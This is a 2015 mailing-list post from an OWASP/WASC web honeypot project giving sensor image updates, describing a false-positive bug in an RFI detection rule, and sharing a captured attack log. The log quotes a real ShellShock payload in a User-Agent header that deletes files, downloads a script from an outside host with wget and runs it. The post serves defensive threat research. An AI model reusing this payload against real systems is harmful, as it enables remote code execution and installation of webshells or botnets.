[Owasp_wasc_distributed_web_honeypots_project] Sensor Updates

Ryan Barnett ryan.barnett at owasp.org
Mon Apr 6 14:19:20 UTC 2015


Greetings everyone,
A quick update on the Sensor images -
1. We had a project participant (thanks Pin-Ren  Chiou) convert the VMware
image to an OVF format -
http://projects.webappsec.org/w/file/fetch/94775630/Owasp-honeypot-v1-OVF.zi
p?force_download=1.  If you would prefer to use a different virtual tool
than VMware, then you might want to try this image.
2. For those of you who have logged into the central AuditConsole – you will
note that we are having some issues with a false positive bug in one of our
RFI rules.  This is due to a bug in the use of the SecRuleUpdateActionById
directive used in the honeypot_end.conf file where we are trying to
dynamically modify the existing OWASP CRS RFI rules so that they will fire
off curl scripts to go and download the remote RFI payloads.  In this case,
the rule is breaking since we did not not add in the “chain” action.  As a
result, you are seeing almost all transactions get flagged with the RFI
950120 ID alert.  We have since disabled this rule in our Git repo -
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/owasp-honeypots/rul
es/REQUEST-31-APPLICATION-ATTACK-RFI.conf#L84-104.  The Sensors are
configured to pull from this repo everyday at midnight.  Please take a look
and verify that the rules you have match up with the Git repo and also check
that the Apache process has restarted (/etc/init.d/wasc-honeypot restart).
Despite these False Positives in labeling, it is important to remember that
ALL traffic is suspect by nature in these honeypots so there is still
valuable intel to identify.  I was just looking through some events this
morning and found 4 different BASH ENV (ShellShock) attack attempts.  I used
this “Add Filter” rule -

RULE_ID
@eq
2100080

Here is one example attack -
--VSJ8mX8AAQEAAAzYDywAAAAE-A--
[06/Apr/2015:12:31:22 +0000] VSJ8mX8AAQEAAAzYDywAAAAE 114.32.151.201 50269
192.168.0.222 8080
--VSJ8mX8AAQEAAAzYDywAAAAE-B--
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php /tmp/S0.sh && /bin/mkdir -p
/share/HDB_DATA/.../ && /usr/bin/wget -c http://x3q.altervista.org/gH/S0.php
-O /tmp/S0.sh && /bin/sh /tmp/S0.sh && sh S0.php 0<&1 2>&1   &

It looks like these domains/IP are down and/or now allowing connections so
these S0.php files might have been moved to other locations.  These are
typically similar to RFI attacks that are trying to install either webshells
or IRC botnet scripts.  If anyone gets ahold of the S0.php file from these
attacks, please share details with the team.

Thanks,
Ryan


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp_wasc_distributed_web_honeypots_project/attachments/20150406/6200d8bc/attachment.html>


More information about the Owasp_wasc_distributed_web_honeypots_project mailing list